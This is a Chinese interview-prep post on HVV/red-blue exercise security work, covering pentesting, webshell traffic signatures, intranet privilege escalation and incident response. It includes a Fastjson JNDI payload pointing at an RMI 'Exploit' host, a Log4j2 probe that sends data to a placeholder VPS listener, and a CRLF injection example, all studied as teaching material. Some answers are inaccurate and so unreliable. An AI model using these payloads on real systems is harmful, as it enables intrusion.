上海某家具网站建设方案,英文网站建设980,西安建设工程信息网人员查询,手机网站赏析文章目录 一、护网项目经验1.项目经验**Hvv的分组和流程**有没有遇到过有意思的逻辑漏洞#xff1f;有没有自己开发过武器/工具#xff1f;有做过代码审计吗#xff1f;有0day吗有cve/cnvd吗#xff1f;有src排名吗#xff1f;有没有写过技战法有钓鱼经历吗#xff1f;具… 文章目录 一、护网项目经验1.项目经验**Hvv的分组和流程**有没有遇到过有意思的逻辑漏洞有没有自己开发过武器/工具有做过代码审计吗有0day吗有cve/cnvd吗有src排名吗有没有写过技战法有钓鱼经历吗具体说说你在hvv/攻防演练中取得了哪些成绩 2.简历包装简单自我介绍上一个工作的主要内容 二、渗透相关面试题基础端口号以及入侵方式OSI七层协议**响应状态码都有哪些****WAF和IPS的区别**盲注是什么java内存马类型**内存马有几种类型****shiro反序列化漏洞原理****shiro550与shiro721的区别****Apache Log4j2 远程代码执行漏洞原理**bp怎么隐藏不让对方发现**fastjson不出网怎么打****Fastjson反序列化漏洞****为什么aspx的权限会比asp的权限更高****Windows和Linux利用REDIS有什么不一样****CRLF注入****反弹shell的原理是什么**文件上传怎么绕过csrf跟ssrf区别SSRF用哪些协议、函数怎么绕过修复**xss可以使用哪些标签****XSS弹窗函数和常见的XSS绕过策略****Mssql xp_cmdshell被禁用了怎么办****XXE中PCDATA和CDATA有什么区别****了解哪些中间件漏洞**Kali工具使用Burpsuite等工具抓包报错注入的原理是什么Webshell是什么原理是什么常用的Webshell管理工具冰蝎和菜刀等webshell工具有什么区别Redis未授权有了解吗Springboot 有哪些漏洞常见的网络服务器容器有哪些威胁情报平台序列化与反序列化的区别正向SHELL和反向SHELL的区别xxe原理与攻击手法xss除了获取cookie还能干什么ssrf的原理与危害ssrf和csrf有什么区别如何寻找注入点有用过sql注入传马吗–os-shell的条件内存马免杀有做过吗具体说说不借助dnslog有办法检测log4j2是否出网吗你是如何验证struts2是否存在的数据库有哪些关系型的和非关系型的分别是哪些PHP代码执行的危险函数PHP命令执行函数linux和windows怎么判断什么是免杀免杀有几种途径Java常见的框架中间件及漏洞struct2框架fastjson框架shiro框架weblogic容器tomcat容器 云函数了解吗怎么防御 三、流量分析面试题**响应状态码都有哪些****常见webshell管理工具交互流量特征都有哪些****菜刀特征****冰蝎3.0****冰蝎2.0****冰蝎3.11流量特征****蚁剑****哥斯拉****哥斯拉4.0.1中JAVA_AES_BASE64特征流量特征** **内存马****流量层面分析shiro反序列化漏洞是否攻击成功****在发生命令执行攻击时如何判断是struts2漏洞执行命令****威胁情报类告警产生误报的原因是什么****如何分析文件上传告警是否攻击成功****如何判断Cobalt Strike攻击流量****发生挖矿木马事件通过流量层面如何判断真实性****流量层面分析Apache Log4j2 远程代码执行漏洞是否攻击成功****如何研判sql注入类型告警事件****如何研判JBOSS 反序列化漏洞攻击成功****如何研判Fastjson反序列化漏洞攻击成功****log4j特征如何判断他攻击成功没****SQL注入攻击通常具有以下特征****几万条告警怎么快速找到攻击成功的告警,哪些是误报**如果看到一条sql注入告警怎么判断是否是攻击成功文件上传的攻击特征是什么怎么通过流量分析 判断出对方攻击成功了如果攻击的回显有延迟或者说攻击生效需要一定的时间你不能很快看见 那该怎么通过流量分析判断出攻击是否生效了**struts2命令执行的流量特征** 四、内网相关面试题Windows和Linux提权的方法Windows系统提权的思路Linux有哪些提权思路**说一下Linux利用passwd提权**suid提权的原理bypassuac的方法黄金白银票据详细讲一下金票以及需要的信息读hash读取不到怎么办dcsync的利用条件详细讲一下ACLpsexec和wmic区别**PTT有哪些攻击方法**内网扫描的方式**Liunx系统中任何权限都能访问的临时文件位置****正向代理 反向代理的区别啊** 五、应急响应面试题1.内存马应急(重点)**内存马有几种类型**内存马你怎么查杀****怎么排查java内存马** 2.溯源溯源反制 **溯源有哪些思路**你会用什么办法溯源攻击方的个人信息呢**怎么做溯源国外ip怎么溯源国内ip怎么溯源****针对国内IP的溯源方法****有没有接触过溯源反制啊****已知攻击者IP如何溯源定位攻击人员****溯源会用些什么工具或者在线网站都可以说说常用的服务和对应的端口** **应急响应要干什么啊****应急响应流程**安全设备发现一台Linux主机触发挖矿告警上机排查该机器执行pstop命令未发现挖矿及恶意进程现在怀疑pstop命令被替换动态链接库被劫持请问应该如何处理****如何分析排查钓鱼邮件事件**怎么排查 0day一台机子失陷了因业务需要不能断网怎么处理内网机子失陷怎么做**linux的日志存放在哪个目录下**win登录日志怎么看判断是否登录成功windows事件ID一般是多少**Linux后门排查哪些东西**Linux怎么查看程序调用了哪些文件**判断自己是否给getshell就是给用D盾查杀**挂马怎么排查啊xss webshell**webshell检测思路****网页被挂马了可能有哪些原因**网站被挂马如何应急分析日志用什么工具啊**webshell杀了以后还有外连流量怎么办应急**入侵排查的流程**如何判断是钓鱼邮件**怎么防范邮件钓鱼**针对dnslog的反制****网络基线加固思路****怎么修改TTL值**一台主机在内网进行横向攻击你应该怎么做SQL注入的预防如何查看当前进程临时目录是哪个文件夹用户列表是在哪个目录下(如何查看Linux有哪些用户)和甲方上报 IP 地址你要上报哪些地址呢 一、护网项目经验
1.项目经验
Hvv的分组和流程
HW分为蓝队和红队红队为常说的攻击队蓝队为防守队。蓝队一般分为初级监测组中级研判组高级应急溯源组
流程介绍一般开始前会进行资产梳理并通过漏洞扫描渗透测试以及基线检查等做一些自查一是可以减少暴漏面二是减少一些风险点。有些厂商还会利用几天的时间进行一次内部演练及时发现疏忽处并进行相应整改
作为一个新手小白主要做的就是坚守岗位监测与甲方合作的安全厂商的一些监测设备进行日志分析、IP封堵等其实这些都没有什么技术含量懂web安全和渗透测试基础的基本一看就会熟悉了当然部分厂商会对自己的合作伙伴们进行短期的产品培训。
有没有遇到过有意思的逻辑漏洞
答通过前端接口拼接发现信息泄露包括姓名和手机号等信息在忘记密码处根据上述信息泄露收集的手机号对其中一个手机号进行密码修改获取手机验证码后任意输入手机验证码进行抓包修改响应包参数success为true放包后显示密码修改成功密成功登录那个账号的员工后台
有没有自己开发过武器/工具
答蜜罐复刻的
有做过代码审计吗有0day吗
答没有没有
有cve/cnvd吗
答我菜没有
有src排名吗
答我菜没有
有没有写过技战法
有
有钓鱼经历吗具体说说
答伪造腾讯在线文档二维码等骗取信息
你在hvv/攻防演练中取得了哪些成绩
答这是第二次参加国家级护网一共阻断超3000个恶意IP应急多起蠕虫病毒告警
2.简历包装
简单自我介绍
面试官您好我是xxx。熟悉常见的TOP10漏洞有一定基本漏洞扫描和渗透能力 ,日志分析以及安全设备告警分析,能看懂安全产品然后在校期间也是参加过项目研发的。
上一个工作的主要内容
答主要是进行监测和辅助队友进行一个研判分析同时负责总结汇报情况并申请采取对相应机器进行隔离。
二、渗透相关面试题
基础端口号以及入侵方式
ftp文件传输协议21弱口令匿名登陆
rdp端口3389远程代码执行
ssh端口22命令注入漏洞
telnet远程连接服务23弱口令暴力破解提权
smtp邮件协议25邮件伪造
pop3协议110弱口令
http、https服务80443常见的web攻击
snmp协议161爆破
ldap目录访问协议389未授权访问爆破
smb协议445永恒之蓝永恒之黑
rsync应用程序linux873未授权访问
mysql3306爆破注入
SQL server1433爆破注入攻击
oracle1521爆破注入攻击
redis6379弱口令未授权访问 连接命令redis-cli
postgresql5432注入爆破
mongodb27017爆破未授权
nfs协议2049未授权访问
zookeeper组件2181未授权访问
docker容器未授权访问docker逃逸
zebra路由协议套件弱口令信息泄露
squid代理服务器软件3128远程命令执行
svn版本控制系统3690信息泄露远程代码执行
rundeck服务平台4440跨站请求伪造。
vnc远程桌面共享协议5900弱口令未授权
couchdb数据库5984任意命令执行漏洞越权
weblogic中间件7001反序列化任意文件上传未授权
zabbix网络监控工具10050代码执行登陆绕过
tomcat中间件8080远程代码执行反序列化弱口令
jboss中间件8080反序列化未授权
jetty中间件8080、8443敏感信息泄露
jenkins中间件8080反序列化远程代码执行信息泄露
apache activemq后台服务开源信息代理用于实现消息传递模式。远程代码执行
fastcgi框架未授权ssrf
Hadoop框架未授权远程代码执行
elasticsearch监听端口是一个搜索引擎 9200未授权访问命令执行目录穿越
webmin-web控制面板系统管理工具管理unix系统web界面控制面板。远程命令执行
memcached监听端口是一个内存缓存软件。11211未授权命令执行OSI七层协议
物理层
数据链路层
网络层
传输层
会话层
表示层
应用层响应状态码都有哪些
404404 状态码表示请求资源不存在即表示攻击失败**200**200 状态码表示请求成功但是请求成功并不代表攻击成功具体需要结合请求与 响应进行判断如下图攻击中攻击者尝试利用 Struts2 远程代码执行漏洞S2-045对目标 系统进行攻击响应状态码为 200。该漏洞攻击载荷在 HTTP 请求头部的 Content-Type分 析该攻击载荷如果漏洞存在的话会在响应的头部添加 testvuln 字段值为 1234x1234 即 1522756。分析响应的头部并未发现存在 testvuln 字段因此研判该漏洞攻击未成功。401401 状态表示未授权状态。该状态码返回常见于 HTTP 的 Basic 认证。500500 状态码表示服务器内部错误通常漏洞攻击也会导致出现 500 错误但是出现 500 错误并不表示攻击失败需要根据实际情况研判。301本状态码将浏览器【永久重定向】到另外一个在Location消息头中指定的URL。以后客户端应使用新URL替换原始URL。302本状态码将浏览器【暂时重定向】到另外一个在Location消息头中指定的URL.客户端应在随后的请求中恢复使用原始URL.
WAF和IPS的区别
答IPS位于防火墙和网络的设备之间防火墙可以拦截底层攻击行为但对应用层 的深层攻击行为无能为力。IPS是对防火墙的补充。综合能力更强一些WAF是工作在应用层的防火墙主要对web请求/响应进行防护。
盲注是什么
就是你在测试注入数据库的时候数据库没有任何回显只显示对错。
java内存马类型
filter listener servlet websocket javaagent
内存马有几种类型
内存马是一种在受感染的主机内存中运行的恶意软件。一般来说内存马可以分为以下几种类型
注入型内存马通过利用漏洞将恶意代码注入到正常进程中从而在内存中运行。
自执行型内存马将恶意代码写入自启动项启动后自动运行。
进程注入型内存马利用进程注入技术在受感染进程的内存中运行恶意代码。
Hook型内存马利用Windows API的Hook机制修改进程中的关键函数从而运行恶意代码。
要判断内存马的类型可以使用反病毒软件或专门的安全工具对受感染主机进行扫描和分析。一般来说不同类型的内存马会留下不同的痕迹和特征比如某些进程的不正常行为、异常的网络连接等等。
针对不同类型的内存马处理方法也会有所不同。一般来说可以采取以下措施
注入型内存马修复漏洞、升级软件加强网络安全防护等方法来预防类似攻击对已经感染的主机可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
自执行型内存马可以通过清理自启动项、卸载恶意程序等方式来清除内存马。
进程注入型内存马可以通过杀掉受感染进程或卸载恶意程序等方式来清除内存马。
Hook型内存马可以通过还原Hook、修复关键函数、杀掉受感染进程或卸载恶意程序等方式来清除内存马。shiro反序列化漏洞原理
浏览器或服务器重启后用户不丢失登录状态Shiro 支持将持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中下次读取时进行解密再反序列化。但是在 Shiro 1.2.4 版本之前内置了一个默认且固定的加密 Key导致攻击者可以伪造任意的 rememberMe Cookie进而触发反序列化漏洞Apache Shiro框架提供了记住密码的功能RememberMe用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值先base64解码然后AES解密再反序列化就导致了反序列化RCE漏洞那么Payload产生的过程 命令序列化AES加密base64编码RememberMe Cookie值在整个漏洞利用过程中比较重要的是AES加密的密钥如果没有修改默认的密钥那么就很容易就知道密钥了shiro550与shiro721的区别
1、这两个漏洞主要区别在于Shiro550使用已知密钥碰撞只要有足够密钥库条件较低不需要Remember Cookie
2、Shiro721的ase加密的key基本猜不到系统随机生成可使用登录后rememberMe去爆破正确的key值即利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀然后精心构造 RememberMe Cookie 值来实现反序列化漏洞攻击难度较高Apache Log4j2 远程代码执行漏洞原理
Apache Log4j2 框架中存在一个名为 JNDI Lookup 的功能它允许通过配置文件中的 JNDI 名称引用外部资源。攻击者构造一个特殊的日志消息其中包含恶意的 JNDI 名称并通过网络发送给受影响的应用程序。当应用程序使用 Log4j2 框架解析日志消息时它会尝试查找和引用该 JNDI 名称。如果恶意的 JNDI 名称指向一个恶意的远程资源例如恶意的 LDAP 服务器或 RMI 服务攻击者可以控制该远程资源的内容和行为。攻击者可以在恶意的远程资源中注入恶意代码并在目标系统上执行任意命令或获取敏感信息。bp怎么隐藏不让对方发现
代理设置-其他设置-禁用http://brup…代理设置-其他设置-忽略brup错误
fastjson不出网怎么打
使用Fastjson的黑名单功能Fastjson提供了一个黑名单功能可以用于禁止某些Java类的序列化和反序列化可以通过设置一些敏感类的黑名单禁止序列化和反序列化这些类从而避免一些恶意攻击。
对Fastjson进行安全加固对Fastjson进行安全加固可以避免恶意攻击。可以通过开启自动类型识别检查、限制反序列化对象的深度、限制反序列化对象的大小等措施提高Fastjson的安全性。
使用其他JSON处理器如果对Fastjson存在疑虑或者担心其安全性问题也可以考虑使用其他JSON处理器比如Jackson、Gson等。这些处理器同样具有高性能和易用性并且也可以进行安全加固。
fastjson 反序列化攻击是一种严重的安全漏洞可能会导致应用程序受到攻击和损失Fastjson反序列化漏洞
判断
正常请求是get请求并且没有请求体可以通过构造错误的POST请求即可查看在返回包中是否有fastjson这个字符串来判断。
原理
fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。
fastjson提供了autotype功能在请求过程中我们可以在请求包中通过修改type的值来反序列化为指定的类型而fastjson在反序列化过程中会设置和获取类中的属性
如果类中存在恶意方法就会导致代码执行等这类问题。
无回显怎么办
1.一种是直接将命令执行结果写入到静态资源文件里如html、js等然后通过http访问就可以直接看到结果
2.通过dnslog进行数据外带但如果无法执行dns请求就无法验证了
3.直接将命令执行结果回显到请求Poc的HTTP响应中
利用fastjson注入内存马原理
不知道这里应该怎么说例如spring mvc的话就是通过fastjson的反序列化利用jndi的方式让web端加载恶意类注入controller为什么aspx的权限会比asp的权限更高
ASPX 和 ASP 都是用于创建动态Web页面的技术但它们的实现方式略有不同。
ASP 是经典的ASP技术它使用VBScript或JScript等脚本语言创建动态Web页面。在ASP中权限控制是通过服务器操作系统的权限机制实现的。
而ASPX是ASP.NET技术中的一部分它使用C#、VB.NET等编程语言创建Web页面。在ASP.NET中权限控制是通过.NET框架提供的安全机制实现的。这些机制包括代码访问安全性、角色管理和基于表单的身份验证等。
因此ASPX的权限控制比ASP更高因为它基于.NET框架提供的安全机制这些机制比操作系统的权限机制更强大和灵活。此外ASPX还提供了更多的安全选项例如加密会话状态和防止跨站点脚本攻击等。Windows和Linux利用REDIS有什么不一样
redis是一个非关系型数据库使用的默认端口是6379。常见的漏洞是未授权访问漏洞攻击者无需认证就可以访问内部数据。
性能Redis在Linux上运行的性能通常比在Windows上运行的性能更好这是由于Linux系统的设计和优化使得其能够更好地利用系统资源。
可用性在Windows上运行Redis时其可用性通常会受到操作系统的限制例如系统的最大打开文件数和最大连接数等。而在Linux上这些限制通常可以通过修改系统配置文件来解决。
安全性Redis的安全性与其在Windows或Linux上运行的方式无关但是在实践中由于Windows和Linux的不同权限模型和安全机制使用Redis时需要采取不同的安全措施。例如在Linux上可以使用文件系统权限和防火墙规则来保护Redis服务器而在Windows上需要使用Windows防火墙和用户权限来保护Redis服务器。CRLF注入
Nginx中常见的中间件漏洞
CRLF注入也称为HTTP头注入是一种攻击技术攻击者通过注入CRLF字符序列即回车换行来改变HTTP头部的内容从而实现各种攻击目的例如HTTP响应拆分、HTTP重定向、会话劫持等。
攻击者通常会将CRLF字符序列注入到HTTP请求或响应的参数中例如Cookie、User-Agent、Referer等。在受害者的Web应用程序中如果没有对这些参数进行有效的输入验证和过滤那么CRLF字符序列就会被当作有效的HTTP头部分隔符并导致HTTP头部的内容被注入。
例如攻击者可以将以下内容作为User-Agent参数发送给Web应用程序
User-Agent: scriptalert(CRLF Injection)/script\r\n\r\nHTTP/1.1 200 OK
在这个例子中攻击者在User-Agent参数中注入了CRLF字符序列以便将HTTP响应头部分隔为两个部分。第一个部分是攻击者自己构造的HTTP响应头部分第二个部分则是Web应用程序返回的HTTP响应体。
如果Web应用程序没有对这个User-Agent参数进行有效的输入验证和过滤那么攻击者就可以成功地将自己构造的HTTP响应头部发送给受害者浏览器从而实现各种攻击目的。例如攻击者可以在自己构造的HTTP响应头中设置Location字段将用户重定向到恶意站点从而实现HTTP重定向攻击。或者攻击者可以在自己构造的HTTP响应头中设置Set-Cookie字段从而实现会话劫持攻击。
为了防止CRLF注入攻击Web应用程序应该对所有HTTP请求和响应参数进行有效的输入验证和过滤包括Cookie、User-Agent、Referer等。在输入验证和过滤时应该使用白名单过滤的原则只允许合法的字符集通过而拒绝所有不合法的字符。同时Web应用程序应该使用最新的安全框架和库来保护自己以及及时更新系统和软件的安全补丁。反弹shell的原理是什么
利用TCP协议传了一个bash环境
文件上传怎么绕过
因为是黑盒测试你不知道它的检测规则是怎么样的看看对哪方面做了检测有可能只是前端检测再针对的去绕过一般的话我先根据后端语言去跑一遍后缀名字典然后去尝试各种方法例如变换大小写插入各种特殊字符像%00、单引号、换行符去构造一些畸形的数据包csrf跟ssrf区别
CSRF (Cross-site request forgery)跨站请求伪造SSRF (Server-Side Request Forgery)服务器端请求伪造csrf 一个是客户端发起ssrf是从服务端发起的SSRF用哪些协议、函数怎么绕过修复
file、dict、ldap、gopher可以利用curl函数、file_get_contents()函数、fsockopen()
绕过使用短网址、进制转换、302跳转、DNS重绑
修复禁止不需要的协议、设置URL白名单、统一返回信息、限制请求的端口xss可以使用哪些标签
这个太多了常用的就
scriptaiframeEMBEDsvgbody objectformimgXSS弹窗函数和常见的XSS绕过策略
**弹窗函数**alert、confirm、prompt、onclick**绕过策略**大小写混写双写img/src1%0a或者%0d绕过拼凑绕过
Mssql xp_cmdshell被禁用了怎么办
先看看能不能手动启用不能的话看看有没有其他的扩展存储可以利用有的可以执行系统命令记得有的可以直接操作注册表也可以利用CLR技术类似于mysql中的UDF吧可以直接使用16进制代码来创建自定义函数XXE中PCDATA和CDATA有什么区别
PCDATA就是被解析的字符数据会被解析CDATA属于不会被解析器解析的文本了解哪些中间件漏洞
IIS有解析漏洞PUT任意文件写入漏洞短文件漏洞Apache也有解析漏洞然后目录遍历遇到的比较多Tomcat的话war后门部署、远程代码执行jBoss和WebLogic的话就反序列化漏洞weblogic还有ssrf漏洞任意文件上传Kali工具使用
wiresharkBurpsuite等工具抓包
开代理将关键数据send to repeater,修改报错注入的原理是什么
在MYSQL中使用一些指定的函数来人为制造报错后台没有屏蔽数据库报错信息 在语法发生错误使得查询结果能够出现在错误信息中回显在前端从而从报错信息中获取设定的信息。Webshell是什么原理是什么
WebShell就是一句话木马由于脚本语言的动态性木马文件通过命令执行system函数或者代码执行eval函数等参数为用户外部传入如GET传参POST传参达到执行任意代码任意命令的功能。从而远程控制目标主机常用的Webshell管理工具
冰蝎蚁剑哥斯拉菜刀冰蝎和菜刀等webshell工具有什么区别
答冰蝎有流量动态加密Redis未授权有了解吗
答有可以配合ssrf打组合拳
Springboot 有哪些漏洞
答只知道一个snakeyaml
常见的网络服务器容器
IIS、Apache、nginx、Lighttpd、Tomcat 有哪些威胁情报平台
微步绿盟阿里云奇安信等序列化与反序列化的区别
序列化把对象转化为可传输的字节序列过程称为序列化
反序列化把字节序列还原为对象的过程称为反序列化正向SHELL和反向SHELL的区别
正向shell攻击者连接被攻击者机器反向shell被攻击者主动连接攻击者正向代理客户端代理服务器不知道实际发起请求的客户端反向代理服务器代理客户端不知道实际提供服务的服务端xxe原理与攻击手法
答解析XML输入时可以加载外部实体类造成文件读取命令执行等危害。直接dtd加载dnslog等等
xss除了获取cookie还能干什么
答用户劫持、结合csrf补充貌似能提权
ssrf的原理与危害
答伪造服务器给内网发消息
ssrf和csrf有什么区别
答csrf伪造客户端ssrf伪造服务器端
如何寻找注入点
答字符数字盲注…
有用过sql注入传马吗
答用过into outfile补充可以通过日志文件写入木马
–os-shell的条件
答拥有网站的写入条件补充Secure_file_priv参数为空或者为指定路径。
内存马免杀有做过吗具体说说
答没做过在网上找现成的补充Filter名称是否合理Filter对应的类名是否合理Filter对应的类是否在classpath下网站web.xml中是否存在改filter
不借助dnslog有办法检测log4j2是否出网吗
答dns到vps判断是否出网补充使用logg.error(“KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: …s://xxxxx:8090/{java:version}}”);在自己的VPS上nc -luvvp 8090即可收到信息
你是如何验证struts2是否存在的
答检测工具或者抓包改post把content-Type改为application/xml,放上payload
数据库有哪些关系型的和非关系型的分别是哪些
#### 关系型MySQL3306SQL Server1433Oracle1521DB25000MongoDB27017#### 非关系型Redis6379Memcached11211PHP反序列化PHP代码执行的危险函数
call_user_func()
call_user_func_array()
create_function()
array_map()PHP命令执行函数
system
shell_exec
passthru
exec
popen
proc_open
putenv
assertlinux和windows怎么判断
linux大小写敏感
什么是免杀
将shellcode进行加密动态解密恢复申请可写可执行内存并写入解密后的shellcode将函数指针指向这块内存的起始位置并开始执行。
免杀有几种途径
答修改特征码、流量混淆、花指令、加壳
Java常见的框架中间件及漏洞
struct2框架
一个基于MVC设计模式的Web应用框架)这个框架全是漏洞fastjson框架
阿里巴巴开源的JSON工具解析库1.2.47版本前存在反序列化漏洞框架特征post数据包content-type为application/json, post内容为json数据且其中有type标识
比如
{ a:{ type:java.lang.Class, val:com.sun.rowset.JdbcRowSetImpl }, b:{ type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:rmi://127.0.0.1:1099/Exploit, autoCommit:true }}shiro框架
apache的一个权限管理的开源框架,实现 用户认证、用户授权。若shiro框架服务端使用默认密钥则会存在反序列化漏洞框架特征cookie字段为存在rememberMexxxxx;
weblogic容器
一个基于JAVAEE架构的中间件weblogic存在许多漏洞弱口令SSRF反序列化任意文件上传XMLDecoder反序列化框架特征一般在7001端口漏洞检测常用工具
tomcat容器
最常见的java web容器漏洞弱口令幽灵猫PUT方法任意写文件框架特征一般为8080端口
云函数了解吗怎么防御
C2客户端发出的流量经过云函数转发到达C2服务器因为云函数的服务器是自带CDN的从而达到隐藏的效果。封禁域名apigw.tencentcs.com
三、流量分析面试题
响应状态码都有哪些
不管是对于什么 WEB 漏洞攻击的研判响应状态码都是研判成功与否的首要研判依据 如果响应状态码为 404 基本可以研判攻击失败也就无需再根据请求响应等进一步研判了。当然这并不是绝对的也有例外的情况攻击者在一些情况下也可以篡改响应状态码 如 WebShell 的响应状态码。现在这种情况不多见暂时可以先不考虑
404404 状态码表示请求资源不存在即表示攻击失败**200**200 状态码表示请求成功但是请求成功并不代表攻击成功具体需要结合请求与 响应进行判断如下图攻击中攻击者尝试利用 Struts2 远程代码执行漏洞S2-045对目标 系统进行攻击响应状态码为 200。该漏洞攻击载荷在 HTTP 请求头部的 Content-Type分 析该攻击载荷如果漏洞存在的话会在响应的头部添加 testvuln 字段值为 1234x1234 即 1522756。分析响应的头部并未发现存在 testvuln 字段因此研判该漏洞攻击未成功。401401 状态表示未授权状态。该状态码返回常见于 HTTP 的 Basic 认证。500500 状态码表示服务器内部错误通常漏洞攻击也会导致出现 500 错误但是出现 500 错误并不表示攻击失败需要根据实际情况研判。301本状态码将浏览器【永久重定向】到另外一个在Location消息头中指定的URL。以后客户端应使用新URL替换原始URL。302本状态码将浏览器【暂时重定向】到另外一个在Location消息头中指定的URL.客户端应在随后的请求中恢复使用原始URL.
常见webshell管理工具交互流量特征都有哪些
菜刀特征
默认的webshell中链接密码都是caidaoua头为百度爬虫、请求体中存在eavlbase64等特征字符
响应包中包含XY、php的webshel中流量参数z0、z1、z2冰蝎3.0
默认内置 16 个 user-agentcontent-type为application/octet-stream**
请求包中content-length 为5740或5720可能会根据Java版本而改变)
**每一个请求头中存在Pragma: no-cacheCache-Control: no-cache**冰蝎2.0
建立连接后 所有请求 **Cookie的格式都为: Cookie: PHPSESSID; path/**
静态分析
各种语言的webshell中都会存在**16位数的连接密码**默认变量为key冰蝎3.11流量特征
1、header头顺序是颠倒的
2、发送包是base64返回包是字节数组所以会乱码
3、如果冰蝎密码不对会出现两个连接第一个是post 第二个是get
4. content-type为application/octet-stream 请求包中content-length 为5740或5720可能会根据Java版本而改变)每一个请求头中存在Pragma: no-cacheCache-Control: no-cache
5.异常User-Agent---- 出现WOW64等
6. 频繁访问默认的路径/conn.jsp蚁剑
PHP 类 WebShell流量最中明显的特征为 ini_set (display_errors,0);
同时会带有base64编码解码等字符特征 **每个请求体都存在ini_set(“display_errors”, “0”);
set_time_limit(0)开头**。并且存在base64等字符响应包的结果返回格式为 随机数 结果 随机数哥斯拉
不修改User-AgentUser-Agent会类似于Java/1.8.0_121具体什么版本取决于JDK环境版本
在请求包的Cookie中有一个非常致命的特征最后的分号
标准的HTTP请求中最后一个Cookie的值是不应该出现;的
**请求包的特征**
1. “pass”起始
2. 请求包较长 响应包为0
3. 一个tcp包里面有三个http
**响应包特征**
整个响应包的结构体征为md5前十六位base64md5后十六位哥斯拉4.0.1中JAVA_AES_BASE64特征流量特征
host头
密码和base64字符串是密码base64字符串的形式
发送包是密码bae64字符串的形式返回包是类base64字符串的格式1. 对称加密算法JAVA_AES_BASE64是哥斯拉4.0.1使用的对称加密算法;因此可以根据哥斯拉4.0.1的流量中是否包含JAVA_AES_BASE64来判断是否为哥斯拉4.0.1攻击流量
2. 长度固定哥斯拉4.0.1使用JAVA_AES_BASE64算法对数据进行加密后加密后数据的长度是固定的因此可以根据攻击流量的长度是否固定来判断是否为哥斯拉4.0.1攻击流量
3. 常见数据前缀哥斯拉4.0.1加密的数据在明文数据前会添加特定的前缀;因此可以根据攻击流量中是否包含常见的数据前缀来判断是否为哥斯拉4.0.1攻击流量。内存马
先判断是通过什么方法注入的内存马可以先查看web日志是否有可疑的web访问日志
如果是filter或者listener类型就会有**大量url请求路径相同参数不同的或者页面不存在但是返回200的**
查看是否有类似哥斯拉、冰蝎相同的url请求哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合
通过查找**返回200的url路径对比web目录下是否真实存在文件如不存在大概率为内存马**
如在web日志中并未发现异常可以排查是否为中间件漏洞导致代码执行注入内存马
排查中间件的error.log日志查看是否有可疑的报错根据注入时间和方法根据-
业务使用的组件排查是否可能存在java代码执行漏洞以及是否存在过webshell排查框架漏洞反序列化漏洞。流量层面分析shiro反序列化漏洞是否攻击成功
1. 在HTTP请求头Cookie里出现rememberMe字段以及可能出现自定义类型例如c: aWQ响应体中出现大量编码字符串若需要判断是否攻击成功需对请求数据和响应体内容进行解密判断
2. 检查请求头中的rememberMe cookie。攻击者可能会在此处插入恶意序列化数据
3. 观察服务器响应。如果服务器返回了异常错误信息如Java反序列化异常可能表明攻击成功分析应用程序日志:如果日志中出现了异常堆栈跟踪可能表明攻击成功例如攻击者发送了一个包含恶意序列化数据的请求服务器响应了一个包含Java反序列化异常的错误信息这可能表明攻击成功。在发生命令执行攻击时如何判断是struts2漏洞执行命令
1. 在请求头中存在OGNL表达式一般在url中会出现的攻击特征主要是:.action?method | ?redirect:$ 在conten-type中出现的攻击特征主要有:%{#context 、在报文体中出现的攻击特征主要有:#_memberAccess 等
2. 判断请求中是否包含特定的 Struts2 关键字如method:、redirect:等这些关键字可能是用于执行命令的操作
3. 检查请求中是否包含Content-Type头字段并且值为application/x-www-form-urlencoded这是 Struts2 框架默认的 Content-Type 值用于处理 POST 请求
4. 检查请求参数中是否包含OGNL表达式如${}、%{}等字符
5. 检查请求是否包含一个名为class的参数值为java.lang.Runtime这个参数可以用于执行系统命令威胁情报类告警产生误报的原因是什么
1、防火墙、邮件网关有发起黑域名解析的行为可能是误报
2、威胁情报失效了如何分析文件上传告警是否攻击成功
1、查看响应体响应结果判断服务器是否接受了该上传请求上传成功通常状态码为200查看响应体中是否响应了上传路径访问该上传路径查看文件是否被解析是否存在
2、通过查看态势感知日志判断文件是否落地
3、登陆受害者主机全局搜索上传文件如何判断Cobalt Strike攻击流量
1、http-beacon通信中默认使用get方法向/dpixel、/__utm.gif、/pixel.gif等地址发起请求同时请求头存在cookie字段并且值为base64编码
2、dns-beacon通信中默认使用cdn.、www6.、api.、www.、post.为开头发起dns请求并且查询结果伴随0.0.0.0、0.0.0.80、0.0.0.241等非常规IP
3、心跳包间隔一定时间均有通信且流级上的上下行数据长度固定
4、常见User-AgentCobalt Strike通常使用自定义的User-Agent字符串例如Mozilla/5.0 (Windows NT 10.0; Win64; x64) Cobalt Strike
5、命令和控制流量Cobalt Strike的HTTP请求中可能包含与C2服务器通信的命令和控制信息这些信息在正常的Web请求中不会出现。发生挖矿木马事件通过流量层面如何判断真实性
1. 通信端口挖矿木马可能会使用特定的端口进行通信。例如Monero挖矿木马通常会使用TCP端口3333或5555进行通信
2. 通信流量挖矿木马的通信流量可能会具有特定的特征例如大量的高速数据传输和周期性的通信在数据包中可以看到大量的计算资源使用信息和挖矿结果信息
3. 进程和文件系统挖矿木马可能会创建特定的进程和文件来执行挖矿操作。例如Monero挖矿木马通常会在操作系统上创建名为xmrig的进程并在文件系统上创建名为config.json的配置文件
4. 系统资源挖矿木马可能会占用系统资源例如CPU和内存并可能导致系统崩溃或变得缓慢。
5. 判断流量的数据挖矿木马通常会在通信中发送一些特定的数据例如挖矿难度、钱包地址、挖矿程序版本等如果流量中存在这些数据就可能存在挖矿木马
6. 看数据包的详细信息看终端或者服务器是否有与矿池交互的信息判断是否存在登录到矿池method“:”login“、从矿池接收任务”method“:”job“字段在载荷内容中是否存在ok、success等字段流量层面分析Apache Log4j2 远程代码执行漏洞是否攻击成功
1、dnslog类查看是否存在源ip与dnslog的外联日志记录2、命令执行攻击2.1 有回显响应体中存在命令执行结果2.2无回显 存在源ip与ldap服务ip的外联日志记录如何研判sql注入类型告警事件
1.排除302、404、301、502非200状态码
2.判断请求包内相关的sql语句是否为恶意的SQL语句
3.判断响应体内是否包含数据库敏感信息或者系统信息。如何研判JBOSS 反序列化漏洞攻击成功
1.在访问JBOSS漏洞页面/invoker/readonly后返回值为500
